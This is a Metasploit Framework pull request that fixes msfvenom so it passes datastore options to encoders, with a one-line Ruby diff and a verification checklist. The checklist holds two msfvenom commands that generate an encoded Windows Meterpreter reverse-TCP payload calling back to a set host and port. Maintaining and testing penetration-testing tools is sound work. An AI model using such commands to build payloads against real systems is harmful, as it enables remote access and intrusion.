### PR TITLE
Fix #4346 - Passing datastore to encoders in msfvenom

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -177,6 +177,7 @@ module Msf
         shellcode
       else
         encoder_list.each do |encoder_mod|
+          encoder_mod.datastore.merge!(datastore)
           cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}"
           begin
             return run_encoder(encoder_mod, shellcode.dup)


### PR DESCRIPTION
Fix #4346. It appears we forgot to merge options for encoders.
### Verification
- [ ] Make sure Travis is green
- [ ] Run this command: `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=4444 -a x86 -t raw -a x86 -e x86/alpha_mixed`
- [ ] You should see the encoded output starting with "VTX630VXH49HHH......."
- [ ] Run this command: `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=4444 -a x86 -t raw -a x86 -e x86/alpha_mixed BufferRegister=EAX`
- [ ] You should see the encoded output starting with "PYIIIIIIIIIIIIIIII....."
